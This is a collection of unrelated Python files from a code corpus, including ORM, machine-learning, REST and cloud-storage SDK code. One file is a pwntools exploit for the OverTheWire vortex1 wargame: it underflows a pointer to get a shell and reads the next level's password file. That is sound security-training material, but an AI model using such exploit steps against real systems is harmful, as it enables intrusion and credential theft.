def to_event(self, metadata: EventPayloadMetadata, source: Entity, session: Optional[Entity], profile: Optional[Entity],
options: dict, profile_less: bool) -> Event:
meta = EventMetadata(**metadata.dict())
meta.profile_less = profile_less
return Event(id=str(uuid4()),
metadata=meta,
session=Entity(id=session.id) if session is not None else None,
profile=profile, # profile can be None when profile_less event.
type=self.type,
properties=self.properties,
source=source, # Entity
context=Context(config=options, params={})
)
|
StarcoderdataPython
|
52480
|
<filename>stdnet/orm/mapper.py
import copy
from stdnet import getdb
from query import Manager, UnregisteredManager
def clearall():
for meta in _registry.values():
meta.cursor.clear()
def register(model, backend = None, keyprefix = None, timeout = 0):
    '''Register a :class:`stdnet.orm.StdNet` model with a backend data server.'''
global _registry
from stdnet.conf import settings
backend = backend or settings.DEFAULT_BACKEND
prefix = keyprefix or model._meta.keyprefix or settings.DEFAULT_KEYPREFIX or ''
if prefix:
prefix = '%s:' % prefix
meta = model._meta
meta.keyprefix = prefix
meta.timeout = timeout or 0
objects = getattr(model,'objects',None)
if objects is None or isinstance(objects,UnregisteredManager):
objects = Manager()
else:
objects = copy.copy(objects)
model.objects = objects
meta.cursor = getdb(backend)
objects.model = model
objects._meta = meta
objects.cursor = meta.cursor
_registry[model] = meta
return meta.cursor.name
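
# Illustrative usage (the backend URL, key prefix, and model class are assumptions, not part of this module):
#   from myapp.models import Article
#   register(Article, 'redis://127.0.0.1:6379', keyprefix='myapp', timeout=3600)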
def unregister(model):
global _registry
_registry.pop(model,None)
model._meta.cursor = None
_registry = {}
|
StarcoderdataPython
|
122659
|
#!/usr/bin/env python2
from pwn import *
import time
level = 1
host = 'vortex.labs.overthewire.org'
user = 'vortex%i' % level
chal = 'vortex%i' % level
password = args['PASSWORD']
passfile = '/etc/vortex_pass/<PASSWORD>%i' % (level+1)
binary = '/vortex/%s' % chal
shell = ssh(host=host, user=user, password=password)
r = shell.run(binary)
# Stack layout looks like this:
# -00000214 ptr dd ?
# -00000210 char dd ?
# -0000020C buffer db 512 dup(?)
#
# We start out in the middle of buffer
off_buffer = -0x20c
off_ptr = -0x214
ptr = off_buffer+0x100
r.send('\\' * (ptr-off_ptr-3)) # Underflow PTR, -3 so we set the high byte.
r.send('\xca') # Write the byte
r.send('\\') # Move backward again to undo the ++
r.send('\xca') # Send any byte at all, triggers e()
r.clean()
time.sleep(1)
# Win
r.send('id\n')
log.success('id: %s' % r.recv().strip())
r.send('cat /etc/vortex_pass/vortex2\n')
password = r.recv().strip()
log.success('Password: %s' % password)
print password
|
StarcoderdataPython
|
1662981
|
<filename>scripts/backfill.py
import os
from loguru import logger
import googlemaps
import pandas as pd
from create_ltc_ids import drop_dupes, create_hash
google_key = os.getenv("GOOGLE_API_KEY")
if google_key is None:
raise ValueError("you must set a value for the GOOGLE_API_KEY env variable")
gmaps = googlemaps.Client(key=google_key)
def geocode_address(record):
query = record["address"]
try:
result = gmaps.geocode(query)
except Exception as err:
logger.error("geocode call failed for query %s with error: %s" % (query, err))
return record
if not result:
logger.error("could not find coordinates in geocode result for query %s" % query)
return record
g = result[0]
if not 'geometry' in g:
logger.error("could not find coordinates in geocode result for query %s" % query)
return record
latlon = g.get("geometry").get("location")
record['address'] = g.get("formatted_address") if g.get("formatted_address") else ''
record['lat'] = latlon.get("lat") if latlon.get("lat") else ''
record['lon'] = latlon.get("lng") if latlon.get("lng") else ''
return record
def generate_records():
with open("facilities_not_found.txt", "r") as f:
with open("backfill-address.txt", "r") as b:
lines = f.read().splitlines()
addresses = b.read().splitlines()
records = [ ]
for i in range(len(lines)):
info = lines[i].rsplit("query")[1].strip().replace("LLC,", "").split(",")
record = { }
record["facility_name"] = info[0]
record["address"] = addresses[i]
if "County" in info[1]:
record["county"] = info[1]
record["state"] = info[2]
elif len(info) == 2:
record["state"] = info[1]
elif len(info) == 3:
record["city"] = info[1]
record["state"] = info[2]
else:
record["city"] = info[1]
record["county"] = info[2]
record["state"] = info[3]
records.append(record)
return records
def main():
records = generate_records()
df = pd.DataFrame(records)
df = drop_dupes(df)
df = df.apply(create_hash, axis = 1)
df = df.apply(geocode_address, axis = 1)
df.to_csv('ltc_geocoded_hashed_backfill.csv')
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
1709535
|
<reponame>franneck94/UdemyGAN
from tensorflow.keras.layers import Activation
from tensorflow.keras.layers import Conv2D
from tensorflow.keras.layers import Dense
from tensorflow.keras.layers import Flatten
from tensorflow.keras.layers import Input
from tensorflow.keras.layers import MaxPooling2D
from tensorflow.keras.models import Model
from tensorflow.keras.models import Sequential
def build_cnn():
img_shape = (28, 28, 1)
# Define the CNN
model = Sequential()
# Conv Block 1
model.add(Conv2D(filters=32, kernel_size=7, input_shape=img_shape))
model.add(Conv2D(filters=32, kernel_size=5))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Activation("relu"))
# Conv Block 2
model.add(Conv2D(filters=64, kernel_size=5))
model.add(Conv2D(filters=128, kernel_size=3))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Activation("relu"))
# Fully connected layer 1
model.add(Flatten())
model.add(Dense(units=512))
model.add(Activation("relu"))
    # Fully connected layer 2
model.add(Dense(units=256))
model.add(Activation("relu"))
# Output layer
model.add(Dense(units=10))
model.add(Activation("softmax"))
# Print the CNN layers
# model.summary()
# Model object
img = Input(shape=img_shape)
pred = model(img)
return Model(inputs=img, outputs=pred)
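

# Minimal usage sketch (the optimizer, loss, and training-data names below are illustrative assumptions):
#   model = build_cnn()
#   model.compile(optimizer="adam", loss="categorical_crossentropy", metrics=["accuracy"])
#   model.fit(x_train, y_train, batch_size=128, epochs=5, validation_split=0.1)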
|
StarcoderdataPython
|
103052
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name:decomposition
   Description : Dimensionality reduction examples,
                 intended to illustrate how to use each method
Email : <EMAIL>
Date:2018/1/2
"""
from collections import namedtuple
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.datasets import make_classification
from sklearn.decomposition import (PCA, IncrementalPCA, FactorAnalysis, FastICA, KernelPCA, SparsePCA, MiniBatchSparsePCA, MiniBatchDictionaryLearning,
DictionaryLearning)
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
# data
X, y = make_classification(
n_samples=1000, n_features=5, n_informative=2, n_redundant=0, n_repeated=0, n_classes=3, n_clusters_per_class=1, class_sep=1.5, flip_y=0.01, random_state=0)
# Initial settings
sns.set(style='whitegrid')
color_series = sns.color_palette('Set2', 3)
names = 'class1', 'class2', 'class3'
# plot func
def plot_func(title, colors=color_series, class_names=names, labels=(0, 1, 2)):
"""绘图函数
用于给降维前后的数据进行绘图,以便于做对比
Parameters
----------
:param colors: list
列表形式的颜色集合
:param labels: list or tuple
列表形式的标签集合
:param class_names: str list or tuple
列表形式的类别名集合
:param title: str
绘图的 title
Returns
-------
graph
返回图像
"""
for color, label, class_name in zip(colors, labels, class_names):
plt.scatter(X[y == label, 0], X[y == label, 1], color=color, label=class_name)
plt.title(title)
plt.legend(loc='best')
# Visualization before transformation; only the first two feature dimensions are shown
plt.figure(1)
plot_func('origin data')
# KernelPCA performs nonlinear dimensionality reduction; LDA can only be used for supervised (classification) dimensionality reduction
# ICA is usually used to separate superimposed signals rather than to reduce dimensionality
models_list = [('LDA', LinearDiscriminantAnalysis(n_components=2)), ('PCA', PCA(n_components=2, random_state=0)),
('PCARand', PCA(n_components=2, random_state=0, svd_solver='randomized')),
('IncrementalPCA', IncrementalPCA(n_components=2, batch_size=10, whiten=True)), ('FactorAnalysis', FactorAnalysis(n_components=2, max_iter=500)),
('FastICA', FastICA(n_components=2, random_state=0)), ('KernelPCA', KernelPCA(n_components=2, random_state=0, kernel='rbf')),
('SparsePCA', SparsePCA(n_components=2, random_state=0, verbose=True)),
('MiniBatchSparsePCA', MiniBatchSparsePCA(n_components=2, verbose=True, batch_size=10, random_state=0)),
('DictionaryLearning', DictionaryLearning(n_components=2, verbose=True, random_state=0)),
('MiniBatchDictionaryLearning', MiniBatchDictionaryLearning(n_components=2, batch_size=5, random_state=0, alpha=0.1))]
model = namedtuple('models', ['mod_name', 'mod_ins'])
for i in range(len(models_list)):
mod = model(*models_list[i])
if mod.mod_name == 'LDA':
mod.mod_ins.fit(X, y)
X_new = mod.mod_ins.transform(X)
else:
X_new = mod.mod_ins.fit_transform(X)
plt.figure(i + 2)
plot_func(mod.mod_name + ' transformed data')
print(mod.mod_name + ' finished!')
plt.show()
|
StarcoderdataPython
|
4807145
|
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt # noqa: E402
class ConvergenceChecker(object):
def __init__(self, min_iters=3, max_iters=int(1e13), min_confirmations=1):
assert min_confirmations > 0
self.min_iters = min(max(min_iters, 1 + 2 * min_confirmations),
max_iters)
self.max_iters = max_iters
self.min_confirmations = min_confirmations
assert isinstance(self.min_iters, int)
assert isinstance(self.max_iters, int)
assert isinstance(self.min_confirmations, int)
self.reset()
def __len__(self):
return len(self.values)
def reset(self):
self.values = []
self._is_converged = False
self._logged_lr = np.inf
@property
def values_of_interest(self):
return self.values[self.min_confirmations:]
def check(self, value=0, lr=1):
if self.is_best(value):
self._logged_lr = lr
elif lr > 2 * self._logged_lr:
return False
self.values.append(value)
n = len(self.values)
if n < self.min_iters:
return False
elif n >= self.max_iters:
self._is_converged = True
return True
self._is_converged = self._is_converged or \
(self.get_nbr_confirmations() >= self.min_confirmations)
return self._is_converged
def get_best(self):
n = len(self.values)
if n <= self.min_confirmations:
return - np.inf
return np.min(self.values_of_interest)
def is_best(self, value):
n = len(self.values)
if n < self.min_confirmations:
return False
if n == self.min_confirmations:
return True
return np.min(self.values_of_interest) >= value
def is_converged(self):
return self._is_converged
def get_nbr_confirmations(self):
if len(self.values) < self.min_confirmations + 1:
return 0
return len(self.values_of_interest) - \
np.argmin(self.values_of_interest) - 1
def next_value_ignored(self):
n = len(self.values)
if n < self.min_confirmations:
return True
return False
def create_plot(self, plot_name):
plt.close()
plt.plot(np.arange(len(self.values)), self.values)
plt.axvline(x=self.min_confirmations - 0.5)
plt.axvline(x=len(self.values) - self.min_confirmations - 0.5)
plt.savefig(plot_name)
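# Hedged usage sketch (illustrative only, not part of the original file): the checker is
# fed one scalar per iteration via check(); it reports convergence once the best (lowest)
# value has gone unimproved for min_confirmations iterations. The loss values are made up.
checker = ConvergenceChecker(min_iters=3, min_confirmations=2)
results = [checker.check(v) for v in (1.0, 0.8, 0.7, 0.71, 0.72, 0.73)]
print("converged:", checker.is_converged(), "best value:", checker.get_best())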
|
StarcoderdataPython
|
1755739
|
<reponame>genialis/resolwe<gh_stars>10-100
"""Data viewset."""
from django.db.models import Prefetch, Q
from rest_framework import exceptions, mixins, viewsets
from rest_framework.decorators import action
from rest_framework.response import Response
from resolwe.flow.filters import DataFilter
from resolwe.flow.models import Collection, Data, DescriptorSchema, Entity, Process
from resolwe.flow.models.utils import fill_with_defaults
from resolwe.flow.serializers import DataSerializer
from resolwe.flow.utils import get_data_checksum
from resolwe.permissions.loader import get_permissions_class
from resolwe.permissions.mixins import ResolwePermissionsMixin
from resolwe.permissions.models import Permission, PermissionModel
from resolwe.permissions.utils import get_anonymous_user, get_user
from .mixins import (
ParametersMixin,
ResolweCheckSlugMixin,
ResolweCreateModelMixin,
ResolweUpdateModelMixin,
)
from .utils import get_collection_for_user
class DataViewSet(
ResolweCreateModelMixin,
mixins.ListModelMixin,
mixins.RetrieveModelMixin,
ResolweUpdateModelMixin,
mixins.DestroyModelMixin,
ResolwePermissionsMixin,
ResolweCheckSlugMixin,
ParametersMixin,
viewsets.GenericViewSet,
):
"""API view for :class:`Data` objects."""
qs_permission_model = PermissionModel.objects.select_related("user", "group")
qs_collection_ds = DescriptorSchema.objects.select_related("contributor")
qs_collection = Collection.objects.select_related("contributor")
qs_collection = qs_collection.prefetch_related(
"data",
"entity_set",
Prefetch("descriptor_schema", queryset=qs_collection_ds),
)
qs_descriptor_schema = DescriptorSchema.objects.select_related("contributor")
qs_entity_col_ds = DescriptorSchema.objects.select_related("contributor")
qs_entity_col = Collection.objects.select_related("contributor")
qs_entity_col = qs_entity_col.prefetch_related(
"data",
"entity_set",
Prefetch("descriptor_schema", queryset=qs_entity_col_ds),
)
qs_entity_ds = DescriptorSchema.objects.select_related("contributor")
qs_entity = Entity.objects.select_related("contributor")
qs_entity = qs_entity.prefetch_related(
"data",
Prefetch("collection", queryset=qs_entity_col),
Prefetch("descriptor_schema", queryset=qs_entity_ds),
)
qs_process = Process.objects.select_related("contributor")
queryset = Data.objects.select_related("contributor")
serializer_class = DataSerializer
filter_class = DataFilter
permission_classes = (get_permissions_class(),)
ordering_fields = (
"contributor",
"contributor__first_name",
"contributor__last_name",
"created",
"finished",
"id",
"modified",
"name",
"process__name",
"process__type",
"started",
)
ordering = "-created"
def get_queryset(self):
"""Get the queryset for the given request.
Prefetch only permissions for the given user, not all of them. This is
only possible with the request in the context.
"""
user = get_user(self.request.user)
filters = Q(user=user) | Q(group__in=user.groups.all())
anonymous_user = get_anonymous_user()
if user != anonymous_user:
filters |= Q(user=anonymous_user)
qs_permission_model = self.qs_permission_model.filter(filters)
return self.queryset.prefetch_related(
Prefetch("collection", queryset=self.qs_collection),
Prefetch("descriptor_schema", queryset=self.qs_descriptor_schema),
Prefetch("entity", queryset=self.qs_entity),
Prefetch("process", queryset=self.qs_process),
Prefetch("permission_group__permissions", queryset=qs_permission_model),
)
@action(detail=False, methods=["post"])
def duplicate(self, request, *args, **kwargs):
"""Duplicate (make copy of) ``Data`` objects."""
if not request.user.is_authenticated:
raise exceptions.NotFound
inherit_collection = request.data.get("inherit_collection", False)
ids = self.get_ids(request.data)
queryset = Data.objects.filter(id__in=ids).filter_for_user(
request.user, Permission.VIEW
)
actual_ids = queryset.values_list("id", flat=True)
missing_ids = list(set(ids) - set(actual_ids))
if missing_ids:
raise exceptions.ParseError(
"Data objects with the following ids not found: {}".format(
", ".join(map(str, missing_ids))
)
)
duplicated = queryset.duplicate(
contributor=request.user,
inherit_collection=inherit_collection,
)
serializer = self.get_serializer(duplicated, many=True)
return Response(serializer.data)
@action(detail=False, methods=["post"])
def get_or_create(self, request, *args, **kwargs):
"""Get ``Data`` object if similar already exists, otherwise create it."""
response = self.perform_get_or_create(request, *args, **kwargs)
if response:
return response
return super().create(request, *args, **kwargs)
def perform_get_or_create(self, request, *args, **kwargs):
"""Perform "get_or_create" - return existing object if found."""
self.define_contributor(request)
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
process = serializer.validated_data.get("process")
process_input = request.data.get("input", {})
fill_with_defaults(process_input, process.input_schema)
checksum = get_data_checksum(process_input, process.slug, process.version)
data_qs = Data.objects.filter(
checksum=checksum,
process__persistence__in=[
Process.PERSISTENCE_CACHED,
Process.PERSISTENCE_TEMP,
],
)
data_qs = data_qs.filter_for_user(request.user)
if data_qs.exists():
data = data_qs.order_by("created").last()
serializer = self.get_serializer(data)
return Response(serializer.data)
def _parents_children(self, request, queryset):
"""Process given queryset and return serialized objects."""
queryset = queryset.filter_for_user(request.user)
page = self.paginate_queryset(queryset)
if page is not None:
serializer = self.get_serializer(page, many=True)
return self.get_paginated_response(serializer.data)
serializer = self.get_serializer(queryset, many=True)
return Response(serializer.data)
@action(detail=True)
def parents(self, request, pk=None):
"""Return parents of the current data object."""
return self._parents_children(request, self.get_object().parents)
@action(detail=True)
def children(self, request, pk=None):
"""Return children of the current data object."""
return self._parents_children(request, self.get_object().children.all())
@action(detail=False, methods=["post"])
def move_to_collection(self, request, *args, **kwargs):
"""Move data objects to destination collection."""
ids = self.get_ids(request.data)
dst_collection_id = self.get_id(request.data, "destination_collection")
dst_collection = get_collection_for_user(dst_collection_id, request.user)
queryset = self._get_data(request.user, ids)
queryset.move_to_collection(dst_collection)
return Response()
def _get_data(self, user, ids):
"""Return data objects queryset based on provided ids."""
queryset = Data.objects.filter(id__in=ids).filter_for_user(user)
actual_ids = queryset.values_list("id", flat=True)
missing_ids = list(set(ids) - set(actual_ids))
if missing_ids:
raise exceptions.ParseError(
"Data objects with the following ids not found: {}".format(
", ".join(map(str, missing_ids))
)
)
for data in queryset:
collection = data.collection
if collection and not user.has_perm(Permission.EDIT, obj=collection):
if user.is_authenticated:
raise exceptions.PermissionDenied()
else:
raise exceptions.NotFound()
return queryset
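# Hedged usage sketch (illustrative only, not part of resolwe itself): a viewset like the
# one above is normally exposed through a DRF router in a project's urls.py, e.g.:
#
#   from rest_framework import routers
#   router = routers.DefaultRouter()
#   router.register(r"data", DataViewSet, basename="data")
#   urlpatterns = router.urls
#
# The URL prefix and basename here are assumptions.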
|
StarcoderdataPython
|
44648
|
<filename>src/google-cloud-speech/python/client.py
#!/usr/bin/env python3
import sys
from google.cloud import speech as google_cloud_speech
# Create the client object for the Speech API.
client = google_cloud_speech.SpeechClient()
content = open(sys.argv[1], 'rb').read()
audio = google_cloud_speech.RecognitionAudio(content=content)
config = google_cloud_speech.RecognitionConfig(language_code='en-US')
# Call the service to perform speech recognition.
result = client.recognize(config=config, audio=audio)
print(result)
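# Hedged usage note (not in the original): the script is typically invoked with the path
# of a local audio file, e.g. `python3 client.py audio.flac`, and it assumes credentials
# are provided via the GOOGLE_APPLICATION_CREDENTIALS environment variable.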
|
StarcoderdataPython
|
81292
|
from __future__ import unicode_literals
import collections
import six
from egnyte import base, exc
class FileOrFolder(base.Resource):
"""Things that are common to both files and folders."""
_url_template = "pubapi/v1/fs%(path)s"
_lazy_attributes = {'name', 'folder_id', 'is_folder'}
def _action(self, action, destination):
exc.default.check_response(self._client.POST(self._url, dict(action=action, destination=destination)))
return self.__class__(self._client, path=destination)
def copy(self, destination):
"""Copy this to another path. Destination path should have all segments (including the last one)."""
return self._action('copy', destination)
def move(self, destination):
"""Move this to another path. Destination path should have all segments (including the last one)."""
return self._action('move', destination)
def link(self, accessibility, recipients=None, send_email=None, message=None,
copy_me=None, notify=None, link_to_current=None,
expiry_date=None, expiry_clicks=None, add_filename=None):
"""
Create a link.
* accessibility: Determines how the link can be accessed ('Anyone', 'Password', 'Domain', 'Recipients')
* send_email: If true, Egnyte will send the link by email.
* recipients: List email addresses for people who should receive the link. Only required if send_email is True (List of valid email addresses)
* message: Personal message to be sent in link email. Only applies if send_email is True (plain text)
* copy_me: If True, a copy of the link message will be sent to the link creator. Only applies if send_email is True.
* notify: If True, link creator will be notified via email when link is accessed.
* link_to_current: If True, link will always refer to current version of file. Only applicable for file links.
* expiry_date: The expiry date for the link. If expiry_date is specified, expiry_clicks cannot be set (future date as datetime.date or string in YYYY-MM-DD format)
* expiry_clicks: The number of times the link can be clicked before it stops working. If expiry_clicks is specified, expiry_date cannot be set (value must be between 1 - 10, inclusive)
* add_filename: If True then the filename will be appended to the end of the link. Only applies to file links, not folder links.
Will return sequence of created Links, one for each recipient.
"""
return Links(self._client).create(path=self.path, type=self._link_kind, accessibility=accessibility,
recipients=recipients, send_email=send_email, message=message,
copy_me=copy_me, notify=notify, link_to_current=link_to_current,
expiry_date=expiry_date, expiry_clicks=expiry_clicks, add_filename=add_filename)
def _get(self):
"""Get the right object type (File or Folder), depending on what this path points to in the Cloud File System"""
json = exc.default.check_json_response(self._client.GET(self._url))
if json['is_folder'] and not isinstance(self, Folder):
instance = Folder(self._client, path=self.path)
elif not json['is_folder'] and not isinstance(self, File):
instance = File(self._client, path=self.path)
else:
instance = self
instance._update_attributes(json)
if instance.is_folder:
instance.folders = [Folder(self._client, **folder_data) for folder_data in json.get('folders', ())]
instance.files = [File(self._client, **file_data) for file_data in json.get('files', ())]
return instance
class File(FileOrFolder):
"""
Wrapper for a file in the cloud.
Does not have to exist - this can represent a new file to be uploaded.
path - file path
"""
_upload_chunk_size = 100 * (1024 * 1024) # 100 MB
_upload_retries = 3
_link_kind = 'file'
_lazy_attributes = {'num_versions', 'name', 'checksum', 'last_modified', 'entry_id',
'uploaded_by', 'size', 'is_folder', 'versions'}
_url_template_content = "pubapi/v1/fs-content%(path)s"
_url_template_content_chunked = "pubapi/v1/fs-content-chunked%(path)s"
def upload(self, fp, size=None, progress_callback=None):
"""
Upload file contents.
fp can be any file-like object, but if you don't specify its size in advance it must support tell and seek methods.
Progress callback is optional - if provided, it should match signature of ProgressCallbacks.upload_progress
"""
if isinstance(fp, six.binary_type):
fp = six.BytesIO(fp)
if size is None:
size = base.get_file_size(fp)
if size < self._upload_chunk_size:
# simple, one request upload
retries = max(self._upload_retries, 1)
while retries > 0:
url = self._client.get_url(self._url_template_content, path=self.path)
chunk = base._FileChunk(fp, 0, size)
r = self._client.POST(url, data=chunk, headers={'Content-length': str(size)})
exc.default.check_response(r)
server_sha = r.headers['X-Sha512-Checksum']
our_sha = chunk.sha.hexdigest()
if server_sha == our_sha:
break
retries -= 1
# TODO: retry network errors too
if retries == 0:
raise exc.ChecksumError("Failed to upload file", {})
else: # chunked upload
return self._chunked_upload(fp, size, progress_callback)
def download(self, download_range=None):
"""
Download file contents.
Returns a FileDownload.
Optional range is 2 integer sequence (start offset, end offset) used to download only part of the file.
"""
url = self._client.get_url(self._url_template_content, path=self.path)
if download_range is None:
r = exc.default.check_response(self._client.GET(url, stream=True))
else:
if len(download_range) != 2:
raise exc.InvalidParameters('Download range needs to be None or a 2 element integer sequence')
r = exc.partial.check_response(self._client.GET(url, stream=True, headers={'Range': 'bytes=%d-%d' % download_range}))
return base.FileDownload(r, self)
def _chunked_upload(self, fp, size, progress_callback):
url = self._client.get_url(self._url_template_content_chunked, path=self.path)
chunks = list(base.split_file_into_chunks(fp, size, self._upload_chunk_size)) # need count of chunks
chunk_count = len(chunks)
headers = {}
for chunk_number, chunk in enumerate(chunks, 1): # count from 1 not 0
headers['x-egnyte-chunk-num'] = "%d" % chunk_number
headers['content-length'] = str(chunk.size)
if chunk_number == chunk_count: # last chunk
headers['x-egnyte-last-chunk'] = "true"
retries = max(self._upload_retries, 1)
while retries > 0:
try:
r = self._client.POST(url, data=chunk, headers=headers)
server_sha = r.headers['x-egnyte-chunk-sha512-checksum']
our_sha = chunk.sha.hexdigest()
if server_sha == our_sha:
break
except:
print("_chunked_upload error on POST request to upload chunk, will retry")
retries -= 1
# TODO: retry network errors too
# TODO: refactor common parts of chunked and standard upload
if retries == 0:
raise exc.ChecksumError("Failed to upload file chunk", {"chunk_number": chunk_number, "start_position": chunk.position})
exc.default.check_response(r)
if chunk_number == 1:
headers['x-egnyte-upload-id'] = r.headers['x-egnyte-upload-id']
if progress_callback is not None:
progress_callback(self, size, chunk_number * self._upload_chunk_size)
def delete(self):
"""Delete this file."""
base.Resource.delete(self)
def add_note(self, message):
"""Add a note to this file. Returns the created Note object."""
return self._client.notes.create(self.path, message)
def get_notes(self, **kwargs):
"""Get notes attached to this file. Returns list of Note objects"""
return self._client.notes.list(file=self.path, **kwargs)
class Folder(FileOrFolder):
"""
Wrapper for a folder in the cloud.
Does not have to exist - can represent a new folder yet to be created.
"""
_url_template = "pubapi/v1/fs%(path)s"
_url_template_permissions = "pubapi/v1/perms/folder/%(path)s"
_url_template_effective_permissions = "pubapi/v1/perms/user/%(username)s"
_lazy_attributes = {'name', 'folder_id', 'is_folder'}
_link_kind = 'folder'
folders = None
files = None
def folder(self, path, **kwargs):
"""Return a subfolder of this folder."""
return Folder(self._client, path=self.path + '/' + path, **kwargs)
def file(self, filename, **kwargs):
"""Return a file in this folder."""
return File(self._client, folder=self, filename=filename, path=self.path + '/' + filename, **kwargs)
def create(self, ignore_if_exists=True):
"""
Create a new folder in the Egnyte cloud.
If ignore_if_exists is True, an error raised because the folder already exists will be ignored.
"""
r = self._client.POST(self._url, dict(action='add_folder'))
(exc.created_ignore_existing if ignore_if_exists else exc.created).check_response(r)
return self
def delete(self):
"""Delete this folder in the cloud."""
base.Resource.delete(self)
def list(self):
"""
Gets contents of this folder (in instance attributes 'folders' and 'files')
"""
return self._get()
def get_permissions(self, users=None, groups=None):
"""
Get Permission values for this folder.
"""
query_params = {}
if users is not None:
query_params[u'users'] = '|'.join(six.text_type(x) for x in users)
if groups is not None:
query_params[u'groups'] = '|'.join(six.text_type(x) for x in groups)
url = self._client.get_url(self._url_template_permissions, path=self.path)
r = exc.default.check_json_response(self._client.GET(url, params=query_params))
return PermissionSet(r)
def set_permissions(self, permission, users=None, groups=None):
"""
Set permission level for some users and/or groups for this folder.
"""
url = self._client.get_url(self._url_template_permissions, path=self.path)
data = base.filter_none_values(dict(permission=permission, users=users, groups=groups))
exc.default.check_response(self._client.POST(url, data))
def get_effective_permissions(self, username):
"""
Get effective permissions (both direct, and granted by membership in groups) to this folder for a specific user.
username: name of user (string)
Returns one of 'Owner', 'Full', 'Editor', 'Viewer'
"""
url = self._client.get_url(self._url_template_effective_permissions, username=username)
params = dict(folder=self.path)
r = exc.default.check_json_response(self._client.GET(url, params=params))
return r['permission']
def get_notes(self, **kwargs):
"""Get notes attached to any file in this folder."""
return self._client.notes.list(folder=self.path, **kwargs)
class Link(base.Resource):
"""Link to a file or folder"""
_url_template = "pubapi/v1/links/%(id)s"
_lazy_attributes = {'copy_me', 'link_to_current', 'accessibility', 'notify',
'path', 'creation_date', 'type', 'send_mail'}
def delete(self):
"""Delete this link"""
base.Resource.delete(self)
class User(base.Resource):
"""
Wrapper for a User.
Warning: attribute names in this class use camelCase instead of underscores.
Name is a dictionary with 2 keys: givenName and lastName.
"""
_url_template = "pubapi/v2/users/%(id)s"
_url_template_effective_permissions = "pubabi/v1/perms/user/%(userName)s"
_lazy_attributes = {'userName', 'externalId', 'email', 'name', 'active', 'locked', 'authType',
'role', 'userType', 'idpUserId'}
def delete(self):
"""Delete this user account."""
base.Resource.delete(self)
def update(self, email=None, familyName=None, givenName=None, active=None, sendInvite=None, authType=None,
userType=None, idpUserId=None, userPrincipalName=None):
"""
Modify this user account.
Optional parameters (no change if value is None):
* email: The email address of the user. Any valid email address (e.g. <EMAIL>)
* familyName: The last name of the user. Any plain text (e.g. John)
* givenName: The first name of the user. Any plain text (e.g. Smith)
* active: Whether the user is active or inactive. True or False
* sendInvite: If set to true when creating a user, an invitation email will be sent (if the user is created in active state). True or False
* authType: The authentication type for the user. 'ad' (AD), 'sso' (SAML SSO), 'egnyte' (Internal Egnyte)
* userType: The Egnyte role of the user. 'admin' (Administrator), 'power' (Power User), 'standard' (Standard User)
* idpUserId: Only required if the user is SSO authenticated and not using default user mapping. Do not specify if user is not SSO authenticated. This is the way the user is identified within the SAML Response from an SSO Identity Provider, i.e. the SAML Subject (e.g. jsmith)
* userPrincipalName: Do not specify if user is not AD authenticated. Used to bind child authentication policies to a user when using Active Directory authentication in a multi-domain setup (e.g. <EMAIL>)
"""
url = self._client.get_url(self._url_template, id=self.id)
name = base.filter_none_values(dict(familyName=familyName, givenName=givenName)) or None
data = base.filter_none_values(dict(email=email, active=active, name=name, sendInvite=sendInvite,
authType=authType, userType=userType, idpUserId=idpUserId,
userPrincipalName=userPrincipalName))
json = exc.default.check_json_response(self._client.PATCH(url, data))
self._update_attributes(json)
def get_effective_permissions(self, path):
url = self._client.get_url(self._url_template_effective_permissions, userName=self.userName)
r = exc.default.check_json_response(self._client.GET(url, params=dict(folder=path)))
return r
class Note(base.Resource):
"""Note attached to a file or folder."""
_url_template = "pubapi/v1/notes/%(id)s"
_lazy_attributes = {'file_id', 'file_path', 'can_delete', 'creation_time', 'message', 'username', 'formatted_name'}
def delete(self):
"""Delete this Note"""
base.Resource.delete(self)
def get_file(self):
"""Get the file to which this note is attached."""
return self._client.file(self.file_path)
class Group(base.Resource):
"""Group of users."""
_url_template = "pubapi/v2/groups/%(id)s"
_lazy_attributes = {'displayName', 'members'}
def delete(self):
"""Delete this Group"""
base.Resource.delete(self)
def full_update(self, displayName, members=None):
"""
Full update of this group.
This endpoint is used to overwrite all of the attributes of a group. This is especially useful for making a change to settings that ensures all prior settings are removed.
* displayName: Name of the group (string). Required
* members: List of members to be added to the new group (user ids or User objects). Optional.
"""
url = self._client.get_url(self._url_template, id=self.id)
data = dict(displayName=displayName)
if members is not None:
data['members'] = [dict(value=x.id if isinstance(x, User) else x) for x in members]
json = exc.default.check_json_response(self._client.PATCH(url, data))
self._update_attributes(json)
class Links(base.HasClient):
"""Link management API"""
_url_template = "pubapi/v1/links"
def create(self, path, type, accessibility,
recipients=None, send_email=None, message=None,
copy_me=None, notify=None, link_to_current=None,
expiry_date=None, expiry_clicks=None, add_filename=None,
):
"""
Create links.
* path: The absolute path of the destination file or folder.
* type: This determines what type of link will be created ('File' or 'Folder')
* accessibility: Determines who a link is accessible by ('Anyone', 'Password', 'Domain', 'Recipients')
* send_email: If True, the link will be sent via email by Egnyte.
* recipients: List email addresses of recipients of the link. Only required if send_email is True (List of valid email addresses)
* message: Personal message to be sent in link email. Only applies if send_email is True (plain text)
* copy_me: If True, a copy of the link message will be sent to the link creator. Only applies if send_email is True.
* notify: If True, link creator will be notified via email when link is accessed.
* link_to_current: If True, link will always refer to current version of file. Only applicable for file links.
* expiry_date: The expiry date for the link. If expiry_date is specified, expiry_clicks cannot be set (future date as datetime.date or string in YYYY-MM-DD format)
* expiry_clicks: The number of clicks the link is valid for. If expiry_clicks is specified, expiry_date cannot be set (value must be between 1 - 10, inclusive)
* add_filename: If True then the filename will be appended to the end of the link. Only applies to file links, not folder links.
Will return a sequence of created Links, one for each recipient.
"""
url = self._client.get_url(self._url_template)
data = base.filter_none_values(dict(path=path, type=type, accessibility=accessibility, send_email=send_email,
copy_me=copy_me, notify=notify, add_filename=add_filename, link_to_current=link_to_current,
expiry_clicks=expiry_clicks, expiry_date=base.date_format(expiry_date),
recipients=recipients, message=message))
response = exc.default.check_json_response(self._client.POST(url, data))
# This response has weird structure
links = response.pop('links')
result = []
for l in links:
l.update(response)
result.append(Link(self._client, **l))
return result
